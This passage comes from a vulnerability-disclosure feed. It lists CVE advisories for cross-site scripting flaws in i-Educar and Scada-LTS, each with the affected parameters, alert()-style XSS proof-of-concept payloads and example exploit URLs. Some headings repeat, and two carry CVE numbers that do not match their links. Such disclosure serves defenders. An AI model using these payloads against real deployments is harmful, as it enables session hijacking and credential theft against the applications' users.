href="https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-8784.md" target="_blank" rel="noopener" >https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-8784.md</a></strong></em></p> <h2 id="finder">Finder </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Sat, 09 Aug 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-8785/ https://www.cvehunters.com/p/cve-2025-8785/ <h2 id="cve-2025-8785-multiples-cross-site-scripting-xss-reflected-in-endpoint-educar_usuario_lstphp">CVE-2025-8785: Multiples Cross-Site Scripting (XSS) Reflected in endpoint <code>educar_usuario_lst.php</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-8785" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-8785</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">Multiples Reflected Cross-Site Scripting (XSS) vulnerabilities was identified in the <code>educar_usuario_lst.php</code> endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the <code>nm_pessoa</code>, <code>matricula</code> and <code>matricula_interna</code> parameters.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>educar_usuario_lst.php</code></p> <p>Parameters: <code>nm_pessoa</code>, <code>matricula</code> and <code>matricula_interna</code></p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"> <span class="err">"</span><span class="o">><</span><span class="nx">script</span><span class="o">></span><span class="nx">alert</span><span class="p">(</span><span class="s1">'XSS-PoC2'</span><span class="p">)</span><span class="o"><</span><span class="err">/script></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-8785/image.png" width="854" height="800" srcset="/p/cve-2025-8785/image_hu_ce4439f0be358fe2.png 480w, /p/cve-2025-8785/image_hu_633eab756624dadf.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="106" data-flex-basis="256px" ></p> <h2 id="example-urls">Example URLs: </h2><p><code>/intranet/educar_usuario_lst.php?nm_pessoa=%22%3E%3Cscript%3Ealert('XSS-PoC2')%3C/script%3E</code></p><h2 id="cve-2025-8785-multiples-cross-site-scripting-xss-reflected-in-endpoint-educar_usuario_lstphp">CVE-2025-8785: Multiples Cross-Site Scripting (XSS) Reflected in endpoint <code>educar_usuario_lst.php</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-8785" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-8785</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">Multiples Reflected Cross-Site Scripting (XSS) vulnerabilities was identified in the <code>educar_usuario_lst.php</code> endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the <code>nm_pessoa</code>, <code>matricula</code> and <code>matricula_interna</code> parameters.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>educar_usuario_lst.php</code></p> <p>Parameters: <code>nm_pessoa</code>, <code>matricula</code> and <code>matricula_interna</code></p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"> <span class="err">"</span><span class="o">><</span><span class="nx">script</span><span class="o">></span><span class="nx">alert</span><span class="p">(</span><span class="s1">'XSS-PoC2'</span><span class="p">)</span><span class="o"><</span><span class="err">/script></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-8785/image.png" width="854" height="800" srcset="/p/cve-2025-8785/image_hu_ce4439f0be358fe2.png 480w, /p/cve-2025-8785/image_hu_633eab756624dadf.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="106" data-flex-basis="256px" /></p> <h2 id="example-urls">Example URLs: </h2><p><code>/intranet/educar_usuario_lst.php?nm_pessoa=%22%3E%3Cscript%3Ealert('XSS-PoC2')%3C/script%3E</code></p> <p><code>/intranet/educar_usuario_lst.php?matricula=%22%3E%3Cscript%3Ealert('XSS-PoC2')%3C/script%3E</code></p> <p><code>/intranet/educar_usuario_lst.php?matricula_interna=%22%3E%3Cscript%3Ealert('XSS-PoC2')%3C/script%3E</code></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Stealing session cookies: Attackers can use stolen session cookies to hijack a user's session and perform actions on their behalf.</li> <li>Downloading malware: Attackers can trick users into downloading and installing malware on their computers.</li> <li>Hijacking browsers: Attackers can hijack a user's browser or deliver browser-based exploits.</li> <li>Stealing credentials: Attackers can steal a user's credentials.</li> <li>Obtaining sensitive information: Attackers can obtain sensitive information stored in a user's account or in their browser.</li> <li>Defacing websites: Attackers can deface a website by altering its content.</li> <li>Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.</li> <li>Damaging a business's reputation: Attackers can damage a business's image or spread misinformation by defacing a corporate website.</li> </ul> </p> <h2 id="reference">Reference </h2><p><a class="link" href="https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-8785.md" target="_blank" rel="noopener" >https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-8785.md</a></p> <h2 id="finder">Finder </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Sat, 09 Aug 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-8743/ https://www.cvehunters.com/p/cve-2025-8743/ <h2 id="cve-2025-8743-cross-site-scripting-xss-stored-endpoint-data_source_editshtm-parameter-name">CVE-2025-8743: Cross-Site Scripting (XSS) Stored endpoint <code>data_source_edit.shtm</code> parameter <code>name</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-8743" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-8743</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>data_source_edit.shtm</code> endpoint of the Scada-LTS application. This vulnerability allows attackers to inject malicious scripts into the <code>name</code> parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>data_source_edit.shtm</code></p><h2 id="cve-2025-8743-cross-site-scripting-xss-stored-endpoint-data_source_editshtm-parameter-name">CVE-2025-8743: Cross-Site Scripting (XSS) Stored endpoint <code>data_source_edit.shtm</code> parameter <code>name</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-8743" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-8743</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>data_source_edit.shtm</code> endpoint of the Scada-LTS application. This vulnerability allows attackers to inject malicious scripts into the <code>name</code> parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>data_source_edit.shtm</code></p> <p>Parameter: <code>name</code></p> <p style="text-align: justify;">The application fails to properly validate and sanitize user inputs in the <code>name</code> parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim's browser, potentially compromising the user's data and system.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl"> "><span class="p"><</span><span class="nt">img</span> <span class="na">src</span><span class="o">=</span><span class="s">x</span> <span class="na">onerror</span><span class="o">=</span><span class="s">alert('XSS-PoC3')</span><span class="p">></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-8743/image.png" width="835" height="436" srcset="/p/cve-2025-8743/image_hu_1f6a33a750e3183c.png 480w, /p/cve-2025-8743/image_hu_3bb6ae9b4cbb06a1.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="191" data-flex-basis="459px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Stealing session cookies: Attackers can use stolen session cookies to hijack a user's session and perform actions on their behalf.</li> <li>Downloading malware: Attackers can trick users into downloading and installing malware on their computers.</li> <li>Hijacking browsers: Attackers can hijack a user's browser or deliver browser-based exploits.</li> <li>Stealing credentials: Attackers can steal a user's credentials.</li> <li>Obtaining sensitive information: Attackers can obtain sensitive information stored in a user's account or in their browser.</li> <li>Defacing websites: Attackers can deface a website by altering its content.</li> <li>Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.</li> <li>Damaging a business's reputation: Attackers can damage a business's image or spread misinformation by defacing a corporate website.</li> </ul> </p> <h2 id="reference">Reference </h2><p><a class="link" href="https://github.com/marcelomulder/CVE/blob/main/Scada-LTS/CVE-2025-8743.md" target="_blank" rel="noopener" >https://github.com/marcelomulder/CVE/blob/main/Scada-LTS/CVE-2025-8743.md</a></p> <h2 id="finder">Finder </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Fri, 08 Aug 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-8538/ https://www.cvehunters.com/p/cve-2025-8538/ <h2 id="cve-2025-8508-multiples-cross-site-scripting-xss-stored-in-endpoint-tiposnovo">CVE-2025-8508: Multiples Cross-Site Scripting (XSS) Stored in endpoint <code>tipos/novo</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-8538" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-8538</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">Multiples Stored Cross-Site Scripting (XSS) vulnerabilities was identified in the <code>tipos/novo</code> endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the <code>name</code> and <code>description</code> parameters. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>tipos/novo</code></p><h2 id="cve-2025-8508-multiples-cross-site-scripting-xss-stored-in-endpoint-tiposnovo">CVE-2025-8508: Multiples Cross-Site Scripting (XSS) Stored in endpoint <code>tipos/novo</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-8538" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-8538</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">Multiples Stored Cross-Site Scripting (XSS) vulnerabilities was identified in the <code>tipos/novo</code> endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the <code>name</code> and <code>description</code> parameters. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>tipos/novo</code></p> <p>Parameters: <code>name</code> and <code>description</code></p> <p style="text-align: justify;">The application fails to properly validate and sanitize user inputs in the <code>name</code> and <code>description</code> parameters. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim's browser, potentially compromising the user's data and system.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl"> "><span class="p"><</span><span class="nt">img</span> <span class="na">src</span><span class="o">=</span><span class="s">x</span> <span class="na">onerror</span><span class="o">=</span><span class="s">alert('CVE-Hunters')</span><span class="p">></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-8538/image.png" width="614" height="248" srcset="/p/cve-2025-8538/image_hu_e726bbb8f011c269.png 480w, /p/cve-2025-8538/image_hu_2443b37b14c56128.png 1024w" loading="lazy" alt="Parameter “name”" class="gallery-image" data-flex-grow="247" data-flex-basis="594px" /></p> <p><img src="/p/cve-2025-8538/image-1.png" width="603" height="240" srcset="/p/cve-2025-8538/image-1_hu_a11c807a5cc2d863.png 480w, /p/cve-2025-8538/image-1_hu_e38f31cce2d09ff0.png 1024w" loading="lazy" alt="Parameter “description”" class="gallery-image" data-flex-grow="251" data-flex-basis="603px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Stealing session cookies: Attackers can use stolen session cookies to hijack a user's session and perform actions on their behalf.</li> <li>Downloading malware: Attackers can trick users into downloading and installing malware on their computers.</li> <li>Hijacking browsers: Attackers can hijack a user's browser or deliver browser-based exploits.</li> <li>Stealing credentials: Attackers can steal a user's credentials.</li> <li>Obtaining sensitive information: Attackers can obtain sensitive information stored in a user's account or in their browser.</li> <li>Defacing websites: Attackers can deface a website by altering its content.</li> <li>Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.</li> <li>Damaging a business's reputation: Attackers can damage a business's image or spread misinformation by defacing a corporate website.</li> </ul> </p> <h2 id="reference">Reference </h2><p><a class="link" href="https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8538.md" target="_blank" rel="noopener" >https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8538.md</a></p> <h2 id="finder">Finder: </h2><p><a class="link" href="https://www.linkedin.com/in/karina-gante/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/karina50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/karina-gante/" target="_blank" rel="noopener" >Karina Gante</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Tue, 05 Aug 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-8539/ https://www.cvehunters.com/p/cve-2025-8539/ <h2 id="cve-2025-8539-cross-site-scripting-xss-stored-endpoint-public_distrito_cadphp-parameter-nome">CVE-2025-8539: Cross-Site Scripting (XSS) Stored endpoint <code>public_distrito_cad.php</code> parameter <code>nome</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-8539" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-8539</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>public_distrito_cad.php</code> endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the <code>nome</code> parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>public_distrito_cad.php</code></p><h2 id="cve-2025-8539-cross-site-scripting-xss-stored-endpoint-public_distrito_cadphp-parameter-nome">CVE-2025-8539: Cross-Site Scripting (XSS) Stored endpoint <code>public_distrito_cad.php</code> parameter <code>nome</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-8539" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-8539</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>public_distrito_cad.php</code> endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the <code>nome</code> parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>public_distrito_cad.php</code></p> <p>Parameter: <code>nome</code></p> <p style="text-align: justify;">The application fails to properly validate and sanitize user inputs in the <code>nome</code> parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim's browser, potentially compromising the user's data and system.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl"> "><span class="p"><</span><span class="nt">img</span> <span class="na">src</span><span class="o">=</span><span class="s">x</span> <span class="na">onerror</span><span class="o">=</span><span class="s">alert('CVE-Hunters')</span><span class="p">></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-8539/image.png" width="642" height="260" srcset="/p/cve-2025-8539/image_hu_837fe8e7d394bbec.png 480w, /p/cve-2025-8539/image_hu_26c8ccd795f751a6.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="246" data-flex-basis="592px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Stealing session cookies: Attackers can use stolen session cookies to hijack a user's session and perform actions on their behalf.</li> <li>Downloading malware: Attackers can trick users into downloading and installing malware on their computers.</li> <li>Hijacking browsers: Attackers can hijack a user's browser or deliver browser-based exploits.</li> <li>Stealing credentials: Attackers can steal a user's credentials.</li> <li>Obtaining sensitive information: Attackers can obtain sensitive information stored in a user's account or in their browser.</li> <li>Defacing websites: Attackers can deface a website by altering its content.</li> <li>Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.</li> <li>Damaging a business's reputation: Attackers can damage a business's image or spread misinformation by defacing a corporate website.</li> </ul> </p> <h2 id="reference">Reference </h2><p><a class="link" href="https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8539.md" target="_blank" rel="noopener" >https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8539.md</a></p> <h2 id="finder">Finder </h2><p><a class="link" href="https://www.linkedin.com/in/karina-gante/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/karina50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/karina-gante/" target="_blank" rel="noopener" >Karina Gante</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Tue, 05 Aug 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-8540/ https://www.cvehunters.com/p/cve-2025-8540/ <h2 id="cve-2025-8540-cross-site-scripting-xss-stored-endpoint-public_municipio_cadphp-parameter-nome">CVE-2025-8540: Cross-Site Scripting (XSS) Stored endpoint <code>public_municipio_cad.php</code> parameter <code>nome</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-8540" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-8540</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>public_municipio_cad.php</code> endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the <code>nome</code> parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>public_municipio_cad.php</code></p><h2 id="cve-2025-8540-cross-site-scripting-xss-stored-endpoint-public_municipio_cadphp-parameter-nome">CVE-2025-8540: Cross-Site Scripting (XSS) Stored endpoint <code>public_municipio_cad.php</code> parameter <code>nome</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-8540" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-8540</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>public_municipio_cad.php</code> endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the <code>nome</code> parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>public_municipio_cad.php</code></p> <p>Parameter: <code>nome</code></p> <p style="text-align: justify;">The application fails to properly validate and sanitize user inputs in the <code>nome</code> parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim's browser, potentially compromising the user's data and system.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl"> <span class="p"><</span><span class="nt">img</span> <span class="na">src</span><span class="o">=</span><span class="s">x</span> <span class="na">onerror</span><span class="o">=</span><span class="s">alert(1)</span><span class="p">></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-8540/image.png" width="629" height="255" srcset="/p/cve-2025-8540/image_hu_359015b5f1096a2a.png 480w, /p/cve-2025-8540/image_hu_3bdd2dd3ec479caf.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="246" data-flex-basis="592px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Stealing session cookies: Attackers can use stolen session cookies to hijack a user's session and perform actions on their behalf.</li> <li>Downloading malware: Attackers can trick users into downloading and installing malware on their computers.</li> <li>Hijacking browsers: Attackers can hijack a user's browser or deliver browser-based exploits.</li> <li>Stealing credentials: Attackers can steal a user's credentials.</li> <li>Obtaining sensitive information: Attackers can obtain sensitive information stored in a user's account or in their browser.</li> <li>Defacing websites: Attackers can deface a website by altering its content.</li> <li>Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.</li> <li>Damaging a business's reputation: Attackers can damage a business's image or spread misinformation by defacing a corporate website.</li> </ul> </p> <h2 id="reference">Reference </h2><p><a class="link" href="https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8540.md" target="_blank" rel="noopener" >https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8540.md</a></p> <h2 id="finder">Finder </h2><p><a class="link" href="https://www.linkedin.com/in/karina-gante/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/karina50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/karina-gante/" target="_blank" rel="noopener" >Karina Gante</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Tue, 05 Aug 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-8541/ https://www.cvehunters.com/p/cve-2025-8541/ <h2 id="cve-2025-8541-cross-site-scripting-xss-stored-endpoint-public_uf_cadphp-parameter-nome">CVE-2025-8541: Cross-Site Scripting (XSS) Stored endpoint <code>public_uf_cad.php</code> parameter <code>nome</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-8541" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-8541</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>public_uf_cad.php</code> endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the <code>nome</code> parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>public_uf_cad.php</code></p><h2 id="cve-2025-8541-cross-site-scripting-xss-stored-endpoint-public_uf_cadphp-parameter-nome">CVE-2025-8541: Cross-Site Scripting (XSS) Stored endpoint <code>public_uf_cad.php</code> parameter <code>nome</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-8541" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-8541</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>public_uf_cad.php</code> endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the <code>nome</code> parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>public_uf_cad.php</code></p> <p>Parameter: <code>nome</code></p> <p style="text-align: justify;">The application fails to properly validate and sanitize user inputs in the <code>nome</code> parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim's browser, potentially compromising the user's data and system.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl"> <span class="p"><</span><span class="nt">img</span> <span class="na">src</span><span class="o">=</span><span class="s">x</span> <span class="na">onerror</span><span class="o">=</span><span class="s">alert(1)</span><span class="p">></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-8541/image.png" width="622" height="277" srcset="/p/cve-2025-8541/image_hu_18e90d6158627beb.png 480w, /p/cve-2025-8541/image_hu_cbe4a54f17fc1f35.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="224" data-flex-basis="538px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Stealing session cookies: Attackers can use stolen session cookies to hijack a user's session and perform actions on their behalf.</li> <li>Downloading malware: Attackers can trick users into downloading and installing malware on their computers.</li> <li>Hijacking browsers: Attackers can hijack a user's browser or deliver browser-based exploits.</li> <li>Stealing credentials: Attackers can steal a user's credentials.</li> <li>Obtaining sensitive information: Attackers can obtain sensitive information stored in a user's account or in their browser.</li> <li>Defacing websites: Attackers can deface a website by altering its content.</li> <li>Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.</li> <li>Damaging a business's reputation: Attackers can damage a business's image or spread misinformation by defacing a corporate website.</li> </ul> </p> <h2 id="reference">Reference </h2><p><a class="link" href="https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8541.md" target="_blank" rel="noopener" >https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8541.md</a></p> <h2 id="finder">Finder </h2><p><a class="link" href="https://www.linkedin.com/in/karina-gante/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/karina50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/karina-gante/" target="_blank" rel="noopener" >Karina Gante</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Tue, 05 Aug 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-8542/ https://www.cvehunters.com/p/cve-2025-8542/ <h2 id="cve-2025-8508-multiples-cross-site-scripting-xss-stored-in-endpoint-empresas_cadphp">CVE-2025-8508: Multiples Cross-Site Scripting (XSS) Stored in endpoint <code>empresas_cad.php</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-8542" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-8542</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">Multiples Stored Cross-Site Scripting (XSS) vulnerabilities was identified in the <code>empresas_cad.php</code> endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the <code>fantasia</code> and <code>razao_social</code> parameters. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>empresas_cad.php</code></p><h2 